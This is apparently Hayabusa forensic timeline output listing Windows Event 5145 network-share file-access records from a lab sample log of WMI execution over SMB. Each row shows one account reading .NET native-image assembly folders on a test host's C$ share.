0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\5e015d37aa3fdc75648e9d00d44d13ac | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#\3c06d012b88601107a4449fb04067a20 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#\67f143e1f5d81dae33879b84e0035cad | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#\03d76bf2a39a57e8bed74e782c62fd1c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\ee53227bcc4430088d0b560752c1cd02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\39bc23d9592ef276c70a36ef0311070a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\4c3126aec3364546e4ade89c24c4e742 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\6d5f82d8178e3d8e9931e70dce584863 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\95c749867e5f72a09ed1e59a57931301 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web\90285827b1300835ca1aaff1dff83a01 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#\3dde15282321aa41c609dc7f7a5f1af5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#\61d489d8a768782ce394f299dcc0e4bb | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#\f2c2cff3fa34c990079298396b1ec1fc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\4b7763786015950c44dbba0ff26b883e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#\af89139de3b87146c705fa989eeaa4b1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#\db42d61826797328b8b368348c6b3f13 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#\9de316f43fe18621a13deefe7dbbbc27 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.078 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#\5a669ebdf74fb2c8f0d8148b4f79b9a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#\81722d79b43d0329413516f10c3faf60 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#\cd0ef620fc82b9dab224ae428bb2a910 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity\0023a84796c78827e3d0176900ba5b59 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile\84ecb78e3635883e1cf8acae1dec527e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing\aa9b0e256833bf2671e6cb5370559f4f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services\fe0f1499df5082fd5392827ddfb03c9e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#\1235ba87f20536f0d0826b2ed514ab19 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#\928d9b9947cc9afb702c0c2fe2945da7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.150 